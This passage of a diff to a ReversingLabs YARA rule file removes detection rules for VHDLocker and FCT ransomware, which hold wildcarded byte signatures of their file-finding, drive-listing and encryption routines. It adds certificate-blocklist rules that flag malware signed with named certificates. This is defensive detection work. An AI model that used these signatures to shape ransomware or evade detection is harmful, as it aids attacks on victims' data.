-            FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $remote_server_1 and $remote_server_2 and $enum_shares_and_encrypt_files
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "18:7d:92:86:10:76:e4:69:b5:b7:a1:9e:2a:9f:d4:ba" and 1476748800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Vhdlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_199A9476Feca3C004Ff889D34545De07 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects VHDLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "696f8145-342b-5da5-b9ec-6f0d16afc465"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "4bb98380-70e5-5ad9-adb2-2e6e10f35258"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.VHDLocker.yara#L1-L152"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14440-L14456"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "39d1fbfc79d5ea866498bb1e40d2290469df774ce65b1da04a85c0e4e5b4493c"
+		logic_hash = "39c6efefcbd78d5e08ffd8d3989cab3bdf273a1847b2a961f9e68c9ee95e85b6"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "VHDLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 50 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            33 DB 8D 95 ?? ?? ?? ?? 53 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ??
-            ?? ?? 89 9D ?? ?? ?? ?? 33 F6 8B FF 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ?? 46 83 FE ??
-            7C ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D
-            B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 8D
-        }
-		$encrypt_files_p2 = {
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 57 FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50 57 FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? 52 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D 95 ?? ?? ??
-            ?? 52 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 81 BD ??
-            ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ??
-            ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 11 9D ?? ?? ?? ??
-            83 FA ?? 0F 84 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9
-        }
-		$encrypt_files_p3 = {
-            75 ?? 2B C2 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51 8D 14 00 A1 ?? ?? ?? ?? 52 53 50 FF D6
-            8B 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 52 FF D6 8B 15 ??
-            ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? 51 52 FF D6 8B 0D ?? ?? ?? ?? 6A
-            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 51 FF D6 8B 0D ?? ?? ?? ?? 6A ?? 8D 95
-            ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 51 FF D6 EB ?? 8B 9D ?? ?? ?? ?? 6A ?? 33
-            C9 51 51 B8 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 DB EB ?? 83 85 ?? ??
-            ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55
-            ?? 8B B5 ?? ?? ?? ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 52 FF 15 ?? ?? ?? ?? 33 C9
-            51 51 33 C0 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64
-            89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 68 ?? ?? ?? ?? 33 F6
-            8D 8D ?? ?? ?? ?? 33 C0 56 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8D 95
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ??
-            52 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B
-            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 57 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ??
-            66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83
-        }
-		$find_files_p2 = {
-            D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
-            ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33
-            C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 BB ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 90
-            66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ??
-            ?? ?? ?? 57 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
-            ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 3A C1 75 ?? 01 0D ?? ?? ??
-            ?? 11 35 ?? ?? ?? ?? EB ?? 01 0D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51
-            53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5E 33 CD
-            B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$get_logical_drives_list_p1 = {
-            8D 85 ?? ?? ?? ?? 50 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57
-            57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ??
-            ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89
-            A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
-            FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75
-            ?? 57 8D 8D ?? ?? ?? ?? 2B C2 51 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ??
-            ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF 15
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85
-            D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB
-        }
-		$get_logical_drives_list_p2 = {
-            1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 89 B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ??
-            ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 39 78 ?? 72 ?? 8B 00 8D
-            50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ??
-            ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            39 78 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ??
-            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83
-            FE ?? 0F 8C ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B
-            4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $get_logical_drives_list_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Funcall" and pe.signatures [ i ] . serial == "19:9a:94:76:fe:ca:3c:00:4f:f8:89:d3:45:45:de:07" and 1138060800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_FCT : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Efe65 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects FCT ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ea3d5514-d6f2-5fd0-9247-a3f6b920d8d9"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "e402e3b4-a598-504d-85b8-8c1994cb51fc"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FCT.yara#L1-L86"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14458-L14474"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b158ad56c92a926f7398a27b3576c259e39c9716ef192fa5944ce3cffdc6d7d0"
+		logic_hash = "f849b6899b6766807cfddf99ecb809fe923f35f04de09b62235da352ce6e6e24"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FCT"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ??
-            ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 DB 8B 55 ?? 33 C9 8B 75
-            ?? 89 9D ?? ?? ?? ?? 85 D2 74 ?? 66 90 83 7D ?? ?? 8D 45 ?? 0F 43 C6 0F BE 04 08 41
-            03 D8 3B CA 72 ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B CF C7 45 ?? ?? ?? ?? ?? 33 C0
-            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1
-            F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ??
-            72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ?? ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33
-            D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
-        }
-		$find_files_p2 = {
-            52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55
-            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 55 ?? 8D 48 ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 52
-            ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83
-            FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
-            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D
-            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8
-        }
-		$encrypt_files_p1 = {
-            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ?? 72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ??
-            ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33 D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 8B 5D ?? 2B CA 8B 55 ?? 8B C3 D1 F9 2B
-            C2 3B C8 77 ?? 83 FB ?? 8D 04 09 50 8D 75 ?? 0F 43 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 3C
-            0A 89 7D ?? 8D 04 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 8D 85 ??
-            ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 81 BD
-            ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F
-            84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F2 85 F6 74
-        }
-		$encrypt_files_p2 = {
-            6A ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 2B C6 56 03 C1 50 57 FF 15 ?? ?? ?? ?? 2B 75 ?? 74
-            ?? 8B 8D ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 9D ?? ?? ?? ??
-            BA ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 CB ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            89 95 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8D 48 ?? 3B CA 76 ?? C6 85 ?? ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 95 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 3B C2 77 ?? 8D 34 00 89 85 ??
-            ?? ?? ?? 83 FA ?? 8D BD ?? ?? ?? ?? 56 0F 43 BD ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83
-            C4 ?? 33 C0 66 89 04 37 EB ?? 50 51 C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ??
-            72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 6A ?? 0F 43 B5 ?? ?? ?? ?? 8D 79 ?? 68 ?? ?? ?? ??
-            89 BD ?? ?? ?? ?? 8D 04 4E 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 6A ??
-            68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 8D ?? ?? ?? ?? 83 7D
-            ?? ?? 51 0F 43 45 ?? 50 FF 15
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Software Plugin Ltd." and pe.signatures [ i ] . serial == "1e:fe:65" and 1063224491 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0Af7E2B6A3Deb99291Dcaf66 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "f9c18796-995e-58f8-8406-9adcad143ae7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14476-L14492"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "270b5655a0f54abceb520eaca714ed4f6d4de720883e2759acd5bb2f027dfd2b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
